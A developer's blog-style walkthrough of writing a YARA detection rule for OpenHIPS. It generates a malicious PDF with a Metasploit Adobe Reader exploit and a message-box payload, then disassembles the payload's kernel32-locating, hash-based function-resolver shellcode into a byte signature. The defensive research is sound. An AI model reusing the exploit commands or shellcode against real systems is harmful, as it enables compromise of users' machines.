In working on OpenHIPS, I need to generate YARA signatures for shellcode to detect the exploits used against browsers and client applications, like Adobe Reader. The first thing I did was use metasploit to generate a "malicious" PDF. Starting up metasploit 3 on Windows, I tried a couple of exploits before I came across one that worked well, as shown:
msf < use exploit/windows/fileformat/adobe_geticon
msf exploit(adobe_geticon) < set PAYLOAD windows/messagebox
PAYLOAD =< windows/messagebox
msf exploit(adobe_geticon) < exploit
[*] Creating 'msf.pdf' file...
[*] Generated output file C:/metasploit/msf3/data/exploits/msf.pdf
[*] Exploit completed, but no session was created.
This exploit uses a heap spray, so I commented out the code in OpenHIPS to detect large memory usage in my testing. Next I brought up a Windows XP SP2 VM and installed Adobe 8.1.2 from I opened up the msf.pdf
file with this version of Adobe and after a while (it takes a while to allocate about 700MB for the heap spray), it popped up a little message box.
With the exploited Adobe Reader running, I attached WinDbg to it, and typed in the following in order to find the thread that had spawned the messagebox:
< ~* k
0 Id: 100.54c Suspend: 1 Teb: 7ffdf000 Unfrozen
ChildEBP RetAddr
0012d8cc 77d493f5 ntdll!KiFastSystemCallRet
0012d904 77d5688a USER32!NtUserWaitMessage+0xc
0012d92c 77d6b7c5 USER32!InternalDialogBox+0xd0
0012dbec 77d6b12b USER32!SoftModalMessageBox+0x938
0012dd3c 77d95fdf USER32!MessageBoxWorker+0x2ba
0012dd94 77d96084 USER32!MessageBoxTimeoutW+0x7a
0012ddc8 77d80598 USER32!MessageBoxTimeoutA+0x9c
0012dde8 77d80550 USER32!MessageBoxExA+0x1b
0012de04 0a11fff2 USER32!MessageBoxA+0x45
WARNING: Frame IP not in any known module. Following frames may be wrong.
< u 0a11fff2
The command ~* k
shows a stack backtrace of all the functions for every thread. I cut out all the other threads. Then I looked at the assembly code at address 0x0a11fff2
where the MessageBoxA
call was made from. I scrolled back up through the assembly instructions, and luckily I knew what I was looking for, because metasploit is open-source, so I can look at the file C:\metasploit\msf3\modules\payloads\singles\windows\messagebox.rb
and I found the following assembly inside the ruby code interesting because it is searching through memory for the kernel32.dll file, and then looking for a specific function (MessageBoxA). This looks like a good signature to me.
;get kernel32
xor ecx,ecx
mov esi, [fs:ecx + 0x30]
mov esi, [esi + 0x0C]
mov esi, [esi + 0x1C]
mov eax, [esi + 0x08]
mov edi, [esi + 0x20]
mov esi, [esi]
cmp [edi + 12*2], cl
jne next_module
pop ecx
add ecx,edx
jmp ecx ;jmp start_main
pushad ;save all registers
mov ebp, [esp + 0x24] ;put base address of module that is being loaded in ebp
mov eax, [ebp + 0x3c] ;skip over MSDOS header
mov edx, [ebp + eax + 0x78] ;go to export table and put relative address in edx
add edx, ebp ;add base address to it.
;edx = absolute address of export table
mov ecx, [edx + 0x18] ;set up counter ECX
;(how many exported items are in array ?)
mov ebx, [edx + 0x20] ;put names table relative offset in ebx
add ebx, ebp ;add base address to it.
;ebx = absolute address of names table
jecxz find_function_finished ;if ecx=0, then last symbol has been checked.
;(should never happen)
;unless function could not be found
dec ecx ;ecx=ecx-1
mov esi, [ebx + ecx * 4] ;get relative offset of the name associated
;with the current symbol
;and store offset in esi
add esi, ebp ;add base address.
;esi = absolute address of current symbol
xor edi, edi ;zero out edi
xor eax, eax ;zero out eax
cld ;clear direction flag.
;will make sure that it increments instead of
;decrements when using lods*
lodsb ;load bytes at esi (current symbol name)
;into al, + increment esi
test al, al ;bitwise test :
;see if end of string has been reached
jz compute_hash_finished ;if zero flag is set = end of string reached
ror edi, 0xd ;if zero flag is not set, rotate current
;value of hash 13 bits to the right
add edi, eax ;add current character of symbol name
;to hash accumulator
jmp compute_hash_again ;continue loop
cmp edi, [esp + 0x28] ;see if computed hash matches requested hash
; (at esp+0x28)
;edi = current computed hash
;esi = current function name (string)
jnz find_function_loop ;no match, go to next symbol
mov ebx, [edx + 0x24] ;if match : extract ordinals table
;relative offset and put in ebx
add ebx, ebp ;add base address.
;ebx = absolute address of ordinals address table
mov cx, [ebx + 2 * ecx] ;get current symbol ordinal number (2 bytes)
mov ebx, [edx + 0x1c] ;get address table relative and put in ebx
add ebx, ebp ;add base address.
;ebx = absolute address of address table
mov eax, [ebx + 4 * ecx] ;get relative function offset from its ordinal
;and put in eax
add eax, ebp ;add base address.
;eax = absolute address of function address
mov [esp + 0x1c], eax ;overwrite stack copy of eax so popad
;will return function address in eax
popad ;restore original registers.
;eax will contain function address
Correlating this back to the actual memory in the program, I can see the following:
0a11fef5 31c9 xor ecx,ecx
0a11fef7 648b7130 mov esi,dword ptr fs:[ecx+30h]
0a11fefb 8b760c mov esi,dword ptr [esi+0Ch]
0a11fefe 8b761c mov esi,dword ptr [esi+1Ch]
0a11ff01 8b4608 mov eax,dword ptr [esi+8]
0a11ff04 8b7e20 mov edi,dword ptr [esi+20h]
0a11ff07 8b36 mov esi,dword ptr [esi]
0a11ff09 384f18 cmp byte ptr [edi+18h],cl
0a11ff0c 75f3 jne 0a11ff01
0a11ff0e 59 pop ecx
0a11ff0f 01d1 add ecx,edx
0a11ff11 ffe1 jmp ecx
0a11ff13 60 pushad
0a11ff14 8b6c2424 mov ebp,dword ptr [esp+24h]
0a11ff18 8b453c mov eax,dword ptr [ebp+3Ch]
0a11ff1b 8b542878 mov edx,dword ptr [eax+ebp+78h]
0a11ff1f 01ea add edx,ebp
0a11ff21 8b4a18 mov ecx,dword ptr [edx+18h]
0a11ff24 8b5a20 mov ebx,dword ptr [edx+20h]
0a11ff27 01eb add ebx,ebp
0a11ff29 e334 jecxz 0a11ff5f
0a11ff2b 49 dec ecx
0a11ff2c 8b348b mov esi,dword ptr [ebx+ecx*4]
0a11ff2f 01ee add esi,ebp
0a11ff31 31ff xor edi,edi
0a11ff33 31c0 xor eax,eax
0a11ff35 fc cld
0a11ff36 ac lods byte ptr [esi]
0a11ff37 84c0 test al,al
0a11ff39 7407 je 0a11ff42
0a11ff3b c1cf0d ror edi,0Dh
0a11ff3e 01c7 add edi,eax
0a11ff40 ebf4 jmp 0a11ff36
0a11ff42 3b7c2428 cmp edi,dword ptr [esp+28h]
0a11ff46 75e1 jne 0a11ff29
0a11ff48 8b5a24 mov ebx,dword ptr [edx+24h]
0a11ff4b 01eb add ebx,ebp
0a11ff4d 668b0c4b mov cx,word ptr [ebx+ecx*2]
0a11ff51 8b5a1c mov ebx,dword ptr [edx+1Ch]
0a11ff54 01eb add ebx,ebp
0a11ff56 8b048b mov eax,dword ptr [ebx+ecx*4]
0a11ff59 01e8 add eax,ebp
0a11ff5b 8944241c mov dword ptr [esp+1Ch],eax
0a11ff5f 61 popad
0a11ff60 c3 ret
You always want to use the actual memory signature. I copied this to a file, and ran the following commands against it in cygwin to get a nice YARA signature:
$ awk 'BEGIN {FS=" "} {printf "%s", $2}' tmp.txt | sed 's/\([0-9a-f]\{2\}\)/\1
31 c9 64 8b 71 30 8b 76 0c 8b 76 1c 8b 46 08 8b 7e 20 8b 36 38 4f 18
75 f3 59 01 d1 ff e1 60 8b 6c 24 24 8b 45 3c 8b 54 28 78 01 ea 8b 4a 18 8b 5a 2
0 01 eb e3 34 49 8b 34 8b 01 ee 31 ff 31 c0 fc ac 84 c0 74 07 c1 cf 0d 01 c7 eb
f4 3b 7c 24 28 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 89
44 24 1c 61 c3
This then ends up in my rules.yar file as:
rule shellcodeFindKernel32
sourceOrg = "metasploit"
sourcePath = "msf3\\modules\\payloads\\singles\\windows\\messagebox.rb"
$string = {31 c9 64 8b 71 30 8b 76 0c 8b 76 1c 8b 46 08 8b 7e 20 8b 36 38 4f 18 75 f3 59 01 d1 ff e1 60 8b 6c 24 24 8b 45 3c 8b 54 28 78 01 ea 8b 4a 18 8b 5a 20 01 eb e3 34 49 8b 34 8b 01 ee 31 ff 31 c0 fc ac 84 c0 74 07 c1 cf 0d 01 c7 eb f4 3b 7c 24 28 75 e1 8b 5a 24 01 eb 66 8b 0c 4b 8b 5a 1c 01 eb 8b 04 8b 01 e8 89 44 24 1c 61 c3}
condition: $string
The next release of OpenHIPS will detect this shellcode, although it will detect the heap spray using up a lot of memory first, or hopefully the instructions used in any nop sled in a heap spray.